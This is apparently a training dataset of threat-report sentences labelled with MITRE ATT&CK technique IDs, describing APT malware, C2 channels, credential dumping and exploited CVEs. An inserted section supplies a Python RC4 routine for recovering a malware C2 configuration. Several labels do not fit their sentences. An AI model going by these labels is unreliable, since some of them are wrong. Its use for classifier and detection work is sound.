{"text1":"Figure 19.\u00a0Scrambling \u2018Mac OSX 10.12\u2019 Encryption The scrambled byte sequence is passed onto the constructor of the class Packet::Packet, which creates a random AES256 key and encrypts the buffer with this key","labels":"['T1573']"}
|
|
{"text1":"It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data: The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key \u201c\\x8B\\xFF\\x55\\x8B\\xEC\\x83\\xEC\\x50\\xA1\\x84\\x18\\x03\\x68\\x33\\xC9\\x66\\xF7\\x45\\x10\\xE8\\x1F\\x89\\x45\\xFC\\x8B\\x45\\x14\\x56\u201d","labels":"['T1573']"}
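The record above describes recovering a C2 configuration by RC4-decrypting 381 bytes of an embedded blob with a fixed key. As an added example (not code from the original page or from the report the snippet quotes), the Python below reimplements that step so the configuration can be pulled out of a sample offline. The key is the 28 bytes printed in the snippet (224 bits, which does not match the "140-bit" wording, so the example simply uses the bytes as quoted); the field layout (three NUL-separated strings: C2 host, URL path, URL parameters) and the blob itself are constructed assumptions. One caveat for reuse against other samples: a plain RC4 matches CryptDecrypt only when the malware imported the raw bytes as the key (a PLAINTEXTKEYBLOB); if the key came from CryptDeriveKey over a hash, the effective key material is different and this routine will not decrypt.

```python
"""Recover an RC4-protected C2 configuration the way the snippet describes.

Added example; not code from the original page or the report it quotes. The
key bytes are the ones printed in the snippet. The blob layout (three
NUL-separated strings: C2 host, URL path, URL parameters) and the blob itself
are constructed assumptions so the example runs offline.
"""

# Key bytes as printed in the snippet. They also decode as an ordinary x86
# function prologue (mov edi,edi; push ebp; mov ebp,esp; sub esp,0x50; ...),
# a hint that the author reused code bytes from the binary as key material.
KEY = bytes.fromhex("8BFF558BEC83EC50A18418036833C966F74510E81F8945FC8B451456")
CONFIG_LEN = 381  # the snippet says 381 bytes are pulled out of the blob


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_c2_config(blob: bytes, key: bytes = KEY) -> dict:
    """Decrypt the first CONFIG_LEN bytes and split them into the three fields.

    A wrong key yields pseudo-random bytes; requiring three printable ASCII
    fields makes that case fail loudly instead of returning garbage.
    """
    if len(blob) < CONFIG_LEN:
        raise ValueError("blob shorter than the expected config length")
    plain = rc4(key, blob[:CONFIG_LEN])
    raw_fields = [f for f in plain.split(b"\x00") if f]
    if len(raw_fields) < 3 or not all(32 <= b < 127 for f in raw_fields[:3] for b in f):
        raise ValueError("decrypted data does not look like a config; wrong key?")
    c2, path, params = (f.decode("ascii") for f in raw_fields[:3])
    return {"c2": c2, "path": path, "params": params}


def build_sample_blob() -> bytes:
    """Constructed stand-in for the malware's global variable (not a real sample)."""
    plain = b"\x00".join([b"c2.example.invalid", b"/update.php", b"id=%s&ver=1"])
    plain = plain.ljust(CONFIG_LEN, b"\x00")  # NUL padding fills the 381 bytes
    return rc4(KEY, plain) + b"\xAA" * 16  # trailing bytes the malware never touches


if __name__ == "__main__":
    print(decrypt_c2_config(build_sample_blob()))
```

Against a real sample, carve the blob from the global variable the snippet mentions (the 381-byte read is the size hint) and pass it to decrypt_c2_config; the decoded host, path and parameters are the network indicators to hunt for.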
|
|
{"text1":"These appeared to be hosted on either Linode or Google Cloud, with a preference for using the ASN AS63949","labels":"['T1102']"}
|
|
{"text1":"Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection","labels":"['T1102']"}
|
|
{"text1":"In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process","labels":"['T1102']"}
|
|
{"text1":"Some APT40 malware tools can evade typical network detection by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications","labels":"['T1102']"}
|
|
{"text1":"This RAT communicates with 5.189.145.248, a command and control (C2) IP address that this group has used previously with other malware, including DarkComet and NJRAT","labels":"['T1102']"}
|
|
{"text1":"BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control (C2) and operational infrastructure","labels":"['T1102']"}
|
|
{"text1":"LOWBALL abuses the Dropbox cloud storage service for command and control (CnC)","labels":"['T1102']"}
|
|
{"text1":"The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3] A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis The threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5] The group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China","labels":"['T1102']"}
|
|
{"text1":"Firstly, the Trojan will use the following regular expression to determine if the C2 server wishes to cancel the C2 communications: 216.58.192.174|2a00:1450:4001:81a::200e|2200::|download.microsoft.com|ntservicepack.microsoft.com|windowsupdate.microsoft.com|update.microsoft.com Additionally, the RogueRobin Trojan uses the regular expressions in Table 3 to confirm that the DNS response contains the appropriate data for it to extract information from","labels":"['T1102']"}
|
|
{"text1":"The string is formatted as \u201c<domain list>|<minimum query size>|<maximum query size>|<hasGarbage>|<sleepPerRequest>|<maximum requests>|<query types>|<hibridMode>|<current query mode>\u201d ^slp Sets the sleep and jitter values ^exit Exits the Trojan Table 5 Commands available within the C# variant of RogueRobin Using Google Drive for C2 A command that was not available in the original PowerShell variant of RogueRobin but is available with the new C# variant is the x_mode","labels":"['T1102']"}
|
|
{"text1":"This command is particularly interesting as it enables an alternative command and control channel that uses the Google Drive API","labels":"['T1102']"}
|
|
{"text1":"To use Google Drive, the x_mode command received from the C2 server via DNS tunneling will be followed by a newline-delimited list of settings needed to interact with the Google Drive account","labels":"['T1102']"}
|
|
{"text1":"Figure 4 x_mode command and new line delimited settings As seen in Figure 4, the settings are stored in variables seen in Table 6, which are used to authenticate to the actor-controlled Google account before uploading and downloading files from Google Drive","labels":"['T1102']"}
|
|
{"text1":"Figure 6 Hardcoded Google Drive URL used in RogueRobin sample When the modification_time for the first file changes, the Trojan downloads the contents from the first file uploaded to the Google Drive","labels":"['T1102']"}
|
|
{"text1":"To get a job from the Google Drive account, the Trojan starts by creating a string that has the following structure with each element within the subdomain subjected to the number to character substitution from Table 4: c<unique identifier><job identifier padded with \u20180\u2019 to make three digits><sequence number>c.<C2 domain> The Trojan will then obtain an OAUTH access token to the Google Drive in the same manner as before when obtaining the unique identifier","labels":"['T1102']"}
|
|
{"text1":"Lastly, the new variant of RogueRobin is capable of using the Google Drive cloud service for its C2 channel, suggesting that DarkHydrus may be shifting to abusing legitimate cloud services for their infrastructure","labels":"['T1102']"}
|
|
{"text1":"The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com","labels":"['T1102']"}
|
|
{"text1":"Then pastebin.com, github.com, mailimg.com, upload.cat, dev-point.com and pomf.cat were used as channels for the different malware stages before achieving a full RAT implementation, which then communicates with the corresponding C2 server","labels":"['T1102']"}
|
|
{"text1":"However, the attack\u2019s different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat","labels":"['T1102']"}
|
|
{"text1":"The command index table and command handler address table.\u00a0 Implant Capabilities Based on the responses received from the control server, the malware can carry out the following malicious tasks: Recursively generate a list of files in a directory and send to the control server Terminate a specific process","labels":"['T1102']"}
|
|
{"text1":"The actor has the following demonstrated capabilities: to include exploits (for Hangul and Microsoft Office) in its workflows; to modify its campaigns by splitting the payload into multiple stages; to use compromised web servers or legitimate cloud based platforms","labels":"['T1102']"}
|
|
{"text1":"Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire","labels":"['T1102']"}
|
|
{"text1":"The majority of documents used the name \u201cgerry knight\u201d for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names","labels":"['T1102']"}
|
|
{"text1":"This tactic uses public web services to host content that contains encoded commands that are decoded by the malware","labels":"['T1102']"}
|
|
{"text1":"This can be seen in the following images taken from hxxp:\/\/ feeds.rapidfeeds[.]com\/88604\/, which is one of the dead drop resolvers we encountered in this sample: Figure 7 Dead drop resolver used by BADNEWS \u00a0 In order to decrypt this data, the authors have included additional steps from previous versions","labels":"['T1102']"}
|
|
{"text1":"Some of the targeted apps were: Whatsapp, YouTube Video Downloader, Google Update, Instagram, Hack Wifi, AirDroid, WifiHacker, Facebook, Photoshop, SkyTV, Hotstar, Trump Dash, PokemonGo, with many more to come","labels":"['T1102']"}
|
|
{"text1":"Receiving C2 instructions from user profiles created by the adversary on legitimate websites\/forums such as Github and Microsoft's TechNet portal","labels":"['T1102']"}
|
|
{"text1":"An increasingly popular tactic by threat actors is to use legitimate hosting services like Google Cloud or CloudFlare for their payload and C2\u00a0 infrastructure, making it much more difficult to safely block IPs","labels":"['T1102']"}
|
|
{"text1":"Hidden Content The primary command and control location used in this campaign is hosted on a blog on blogspot[.]com, which enables the threat actors to hide their malicious content behind a legitimate service","labels":"['T1102']"}
|
|
{"text1":"In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps:\/\/pastebin[.]com","labels":"['T1102']"}
|
|
{"text1":"five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service","labels":"['T1102']"}
|
|
{"text1":"Additional tools were recovered during the incident, including a network scanning\/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as 'spwebmember'","labels":"['T1018']"}
|
|
{"text1":"Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks.\u00a0No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim\u2019s network via credentials likely stolen from a hotel Wi-Fi network.\u00a0 Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder","labels":"['T1018']"}
|
|
{"text1":"At a high-level, their targeting of financial organizations and subsequent heists have followed the same general pattern: Information Gathering: Conducted research into an organization\u2019s personnel and targeted third party vendors with likely access to SWIFT transaction systems to understand the mechanics of SWIFT transactions on victim networks (Please note: The systems in question are those used by the victim to conduct SWIFT transactions","labels":"['T1018']"}
|
|
{"text1":"Host enumeration and lateral movement After gaining an initial foothold in a compromised environment, the threat actors quickly identify and explore accessible systems","labels":"['T1018']"}
|
|
{"text1":"In one example, BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance, including domain enumeration and network state, via ipconfig, net use, net user, and net view commands","labels":"['T1018']"}
|
|
{"text1":"This technique allows them to map network resources and make lateral movements inside the network, landing in the perfect machine to match the attacker\u2019s interest","labels":"['T1018']"}
|
|
{"text1":"APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets","labels":"['T1003']"}
|
|
{"text1":"During privilege escalation, freely available tools such as Mimikatz and Ncrack have been observed, in addition to legitimate tools such as Windows Credential Editor and ProcDump","labels":"['T1003']"}
|
|
{"text1":"APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper\/cracker used alongside the AIRBREAK and BADFLICK backdoors","labels":"['T1003']"}
|
|
{"text1":"The datasets included: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Script to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems We analyzed each type of dataset other than the documents containing detailed information on alleged OilRig operators and they remain consistent with previously observed OilRig tactics, techniques, and procedures (TTPs)","labels":"['T1003']"}
|
|
{"text1":"In total, nearly 13,000 sets of credentials are included in the data dump","labels":"['T1003']"}
|
|
{"text1":"It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump","labels":"['T1003']"}
|
|
{"text1":"Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy","labels":"['T1003']"}
|
|
{"text1":"When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials","labels":"['T1003']"}
|
|
{"text1":"Credential Harvesting Attack On June 24, 2018, Unit 42 observed DarkHydrus carrying out a credential harvesting attack on an educational institution in the Middle East","labels":"['T1003']"}
|
|
{"text1":"Figure 2 Employee survey displayed after credential theft The November 2017 document displays a password handover document after credential theft occurs, as seen in Figure 3","labels":"['T1003']"}
|
|
{"text1":"Figure 3 Password handover form displayed after credential theft The infrastructure used in these credential harvesting attacks used the domain 0utl00k[.]net, which at the time of the attacks resolved to 107.175.150[.]113 and 195.154.41[.]150","labels":"['T1003']"}
|
|
{"text1":"Figure 6 Authentication dialog box with fake credentials entered On the C2 server, we observed Phishery receiving the inbound request and capturing the credentials, as seen in Figure 7","labels":"['T1003']"}
|
|
{"text1":"The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session","labels":"['T1003']"}
|
|
{"text1":"This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets","labels":"['T1003']"}
|
|
{"text1":"Alerts for credential theft tools and privileged account lockouts should be investigated","labels":"['T1003']"}
|
|
{"text1":"(Source: Dell SecureWorks) TG-3390 actors have also used the following publicly available tools: Windows Credential Editor (WCE) \u2014 obtains passwords from memory gsecdump \u2014 obtains passwords from memory winrar \u2014 compresses data for exfiltration nbtscan \u2014 scans NetBIOS name servers Tactics, techniques, and procedures Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions","labels":"['T1003']"}
|
|
{"text1":"15 Database dump Decoded, it reveals a detailed log of each affected machine","labels":"['T1003']"}
|
|
{"text1":"Mimikatz to obtain credentials.","labels":"['T1003']"}
|
|
{"text1":"It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature","labels":"['T1003']"}
|
|
{"text1":"Domains The RoyalCli backdoor was attempting to communicate to the following domains: News.memozilla[.]org video.memozilla[.]org The BS2005 backdoor utilised the following domains for C2: Run.linodepower[.]com Singa.linodepower[.]com log.autocount[.]org RoyalDNS backdoor was seen communicating to the domain: andspurs[.]com Possible linked APT15 domains include: Micakiz.wikaba[.]org cavanic9[.]net ridingduck[.]com zipcodeterm[.]com dnsapp[.]info Published date:\u00a0 10 March 2018 Written by:\u00a0 Rob Smallridge","labels":"['T1008']"}
|
|
{"text1":"In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to","labels":"['T1008']"}
|
|
{"text1":"Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f The post New MacOS Backdoor Linked to OceanLotus Found appeared first on","labels":"['T1008']"}
|
|
{"text1":"Additionally, the malware reports itself to its hardcoded command and control servers and establishes a backdoor connection, so the attacker may have a permanent remote connection","labels":"['T1008']"}
|
|
{"text1":"Business and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad","labels":"['T1083']"}
|
|
{"text1":"These files are downloaded to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected machine by Bxaki() and xparis()","labels":"['T1083']"}
|
|
{"text1":"In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing","labels":"['T1083']"}
|
|
{"text1":"The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php","labels":"['T1083']"}
|
|
{"text1":"The body of the POST request may contain files contained in the cabinet format","labels":"['T1083']"}
|
|
{"text1":"Figure 3 \u2013 A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable \u2013 functionality typical for such destructive trojans \u2013 the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems","labels":"['T1083']"}
|
|
{"text1":"This is the only instance we observed where a hardcoded Google Drive URL was included in RogueRobin, which may suggest that the author may have overlooked this during testing","labels":"['T1083']"}
|
|
{"text1":"HD Creates a file in the Temp path and names it \u201chd\u201d + PCID then invokes another program module named hd.test1 to identify logical drives","labels":"['T1083']"}
|
|
{"text1":"Implant directory contained in the malicious Flash file","labels":"['T1083']"}
|
|
{"text1":"Otherwise, it runs a search for the \u201c\/bin\/rsyncd\u201d string within the files found in the \/etc\/ folder","labels":"['T1083']"}
|
|
{"text1":"watch\/? search\/? find\/? results\/? open\/? search\/? close\/? The \u201cai\u201d value stands for the payload title","labels":"['T1083']"}
|
|
{"text1":"The file names may vary from one version of the malware to another","labels":"['T1083']"}
|
|
{"text1":"In one version of the malware, the code checks if the \u201cProgramData\u201d folder has folders or files with the keywords \u201cKasper\u201c, \u201cPanda\u201c, or \u201cESET\u201c","labels":"['T1083']"}
|
|
{"text1":"It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file","labels":"['T1083']"}
|
|
{"text1":"The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files","labels":"['T1083']"}
|
|
{"text1":"Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files","labels":"['T1083']"}
|
|
{"text1":"4 Upload edg499.dat, which includes the list of interesting files","labels":"['T1083']"}
|
|
{"text1":"Since it is a very long term group, some victims may be impossible to identify now","labels":"['T1083']"}
|
|
{"text1":"PHOTO: a DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files","labels":"['T1083']"}
|
|
{"text1":"This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime","labels":"['T1083']"}
|
|
{"text1":"With the exception of the \u2018Speed\u2019 method previously mentioned, the names of the methods called in this chain appear to be fairly random, as seen in the following list: \u00a0 ETransaksi.Speed ETransaksi.diomadnfagaghagh ETransaksi.fjcsERIfjfiojsGHIsdifjksi ETransaksi.gsgjIDJIGJIGJIGJIFDOSpl ETransaksi.FJaioefgkaoeK \u00a0 The last two methods in the chain carry out a majority of the first payload\u2019s functionality","labels":"['T1083']"}
|
|
{"text1":"Hashes For a list of all hashes of malware encountered during this campaign, please refer to the following file","labels":"['T1083']"}
|
|
{"text1":"17-3 Function names To target specific victims, Astaroth is locale aware; any attempts to run the malware without locale spoofing will result in failed downloads and the inability to run the .dll files","labels":"['T1083']"}
|
|
{"text1":"119 readFiles Obtains file information on a file or a folder, and supports a \u201c*\u201d wildcard and recursive file list","labels":"['T1083']"}
|
|
{"text1":"Get Directory Information The malware gets information for the provided directory address using the following WINAPI calls:","labels":"['T1083']"}
|
|
{"text1":"dir c:\\","labels":"['T1083']"}
|
|
{"text1":"2, 2018, we published a blog detailing the use of\u00a0an Adobe Flash zero-day vulnerability\u00a0(CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper)","labels":"['T1203']"}
|
|
{"text1":"Observed vulnerabilities include: CVE-2012-0158 CVE-2017-0199 CVE-2017-8759 CVE-2017-11882 Figure 2: APT40 attack lifecycle Establish Foothold APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups","labels":"['T1203']"}
|
|
{"text1":"On October 10, 2017, Kaspersky Lab\u2019s advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers","labels":"['T1203']"}
|
|
{"text1":"We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by FireEye in September 2017.\u00a0 The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye","labels":"['T1203']"}
|
|
{"text1":"What does it mean for everyone and how to defend against such attacks, including zero-day exploits? For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it.\u00a0 Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit","labels":"['T1203']"}
|
|
{"text1":"This document exploited a newer vulnerability, CVE-2017-0199","labels":"['T1203']"}
|
|
{"text1":"This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world. Infection Vectors: The attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office","labels":"['T1203']"}
|
|
{"text1":"Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can\u00b4t prove they were related to this particular attack","labels":"['T1203']"}
|
|
{"text1":"This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim\u2019s machine","labels":"['T1203']"}
|
|
{"text1":"In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware","labels":"['T1203']"}
|
|
{"text1":"Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing","labels":"['T1203']"}
|
|
{"text1":"Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly, we have also observed actors leveraging another recently\u00a0discovered vulnerability (CVE-2017-11882) in Microsoft Office","labels":"['T1203']"}
|
|
{"text1":"In many cases, additional stealers, RATs, and other malware were observed being hosted on the same web servers. Analysis of HawkEye Reborn: The campaign starts with sending the aforementioned Excel sheets that exploit the well-known CVE-2017-11882 vulnerability, an arbitrary code execution bug in Microsoft Office","labels":"['T1203']"}
|
|
{"text1":"Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov","labels":"['T1203']"}
|
|
{"text1":"14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East","labels":"['T1203']"}
|
|
{"text1":"In this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER","labels":"['T1203']"}
|
|
{"text1":"CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability CVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote user to run arbitrary code in the context of the current user as a result of improperly handling objects in memory","labels":"['T1203']"}
|
|
{"text1":"Figure 3: CVE-2017-11882 and POWRUNER attack sequence The malicious .rtf file exploits CVE-2017-11882","labels":"['T1203']"}
|
|
{"text1":"An RTF, an MSI file, a .NET Wrapper and two stages of Shellcode walk into a bar\u2026 Our journey begins with an RTF file named \u201cNew Salary Structure 2017.doc\u201d, which exploits CVE-2017-0199","labels":"['T1203']"}
|
|
{"text1":"Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability; however, in late January 2018, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability","labels":"['T1203']"}
|
|
{"text1":"Try to exploit the following Remote Code Execution vulnerabilities in the targeted servers: a) CVE-2012-0874: JBoss Enterprise Application Platform Multiple Security Bypass Vulnerabilities b) CVE-2010-1871: JBoss Seam Framework remote code execution c) JBoss AS 3\/4\/5\/6: Remote Command Execution (exploit) d) CVE-2017-10271: Oracle WebLogic wls-wsat Component Deserialization RCE e) CVE-2018-2894: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware","labels":"['T1203']"}
|
|
{"text1":"We believe the adversary exploited a recent vulnerability in Microsoft SharePoint tracked by , which is a remote code execution vulnerability used to compromise the server and eventually install a webshell","labels":"['T1203']"}
|
|
{"text1":"Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash","labels":"['T1068']"}
|
|
{"text1":"APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure","labels":"['T1068']"}
|
|
{"text1":"Exploitation of this vulnerability allows an attacker to escalate privileges on the affected system","labels":"['T1068']"}
|
|
{"text1":"All zero-day exploits known, or suspected, to have been used by this group are for vulnerabilities in Internet Explorer and Flash","labels":"['T1068']"}
|
|
{"text1":"APT32 regularly used stealthy techniques to blend in with legitimate user activity: During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix","labels":"['T1068']"}
|
|
{"text1":"Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal","labels":"['T1068']"}
|
|
{"text1":"McAfee detects these threats as: RDN\/Generic Exploit RDN\/Generic.dx Generic PWS.y Generic.hbg Exploit-CVE2018-4878 McAfee customers are also covered by McAfee Global Threat Intelligence Web Reputation classification, which rate these URLs as High Risk","labels":"['T1068']"}
|
|
{"text1":"The database is located in the \u201c\/usr\/lib\/cva-ssys\/My_BD\u201d folder (\u201c~\/.local\/cva-ssys\/My_BD\u201d\u2014if the Trojan does not have root privileges)","labels":"['T1068']"}
|
|
{"text1":"CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14","labels":"['T1068']"}
|
|
{"text1":"The first dropped file, doc.exe, contains the CVE-2014-4113 exploit and then attempts to execute test.exe with the elevated privileges","labels":"['T1068']"}
|
|
{"text1":"Are the attackers using any zero-day vulnerabilities? No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign","labels":"['T1068']"}
|
|
{"text1":"OfficeScan\u2019s Vulnerability Protection shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed.\u00a0Trend Micro\u2122\u00a0Deep Discovery\u2122 provides detection, in-depth analysis, and proactive response to attacks using exploits and other similar threats through specialized engines, custom\u00a0sandboxing, and seamless correlation across the entire attack lifecycle, allowing it to detect these attacks even without any engine or pattern update","labels":"['T1068']"}
|
|
{"text1":"Dubbed \u2018SpeakUp\u2019, the new Trojan exploits known vulnerabilities in six different Linux distributions","labels":"['T1068']"}
|
|
{"text1":"Among them, we found variations on the EternalDarkness SMBv3 exploit (CVE-2020-0796) , a , the privilege escalation exploit published on the Google Security Github account, and the privilege escalation exploit.","labels":"['T1068']"}
|
|
{"text1":"A 2016 Novetta report detailed the work of security vendors attempting to unveil tools and infrastructure related to the 2014 destructive attack against Sony Pictures Entertainment","labels":"['T1518.001']"}
|
|
{"text1":"The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products","labels":"['T1518.001']"}
|
|
{"text1":"Tools CTU researchers observed BRONZE UNION using the following tools in intrusions since the 2015 analysis, but clients should assume that the threat group still has access to the previously reported tools","labels":"['T1518.001']"}
|
|
{"text1":"In doing so, it will attempt to detect the following Anti-Virus products via various techniques: Trend Micro Kaspersky Symantec Avira AVG ALYac Ahnlab Ahnlab and ALYac are the most widely used Anti-Virus solutions in South Korea, and Trend Micro and the rest are also known to be most widely used in Taiwan","labels":"['T1518.001']"}
|
|
{"text1":"When combined with email tracking software, APT32 was able to closely track phishing delivery, success rate, and conduct further analysis about victim organizations while monitoring the interest of security firms","labels":"['T1518.001']"}
|
|
{"text1":"APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed","labels":"['T1518.001']"}
|
|
{"text1":"Types of attacks possibly averted include Structured Query Language (SQL) injection, cross-site scripting, and command injection.Use stringent file reputation settings \u2013 Tune the file reputation systems of your anti-virus software to the most aggressive setting possible","labels":"['T1518.001']"}
|
|
{"text1":"We would like to thank White-Hat, Tom Lancaster\u00a0of Palo Alto Networks, Michael Yip of Stroz Friedberg, security researcher Marcus, and other security researchers and organizations who shared information and provided feedback","labels":"['T1518.001']"}
|
|
{"text1":"In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools","labels":"['T1518.001']"}
|
|
{"text1":"Figure 14: System shut down upon discovery of security tools Ability to receive PowerShell script from the C2 server and execute on the machine","labels":"['T1518.001']"}
|
|
{"text1":"Additionally it checks to determine if common analysis tools are currently running on the infected system","labels":"['T1518.001']"}
|
|
{"text1":"Given the regional file format used there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.The documents sent to the targets were titled \"Analysis of \"Northern New Year in 2017\" and used the official logo of the Korean Ministry of Unification","labels":"['T1518.001']"}
|
|
{"text1":"Smart, optimized, and connected, XGen security powers Trend Micro\u2019s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense","labels":"['T1518.001']"}
|
|
{"text1":"Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called \u201cRocket Kitten\u201d (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters","labels":"['T1518.001']"}
|
|
{"text1":"As seen below, the relational analysis proved to be quite fruitful: Figure 1 Overview of relationships We rapidly discovered a different set of tools communicating to the exact same C2 servers as those two Word documents, in addition to other tools communicating to other subdomain variations of chrome-up[.]date as seen in the following graphic: Figure 2 Command and control overlaps From there, we were able to map out a large infrastructure separating out into four categories of tools: downloaders, droppers, loaders, and payloads","labels":"['T1518.001']"}
|
|
{"text1":"The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public","labels":"['T1518.001']"}
|
|
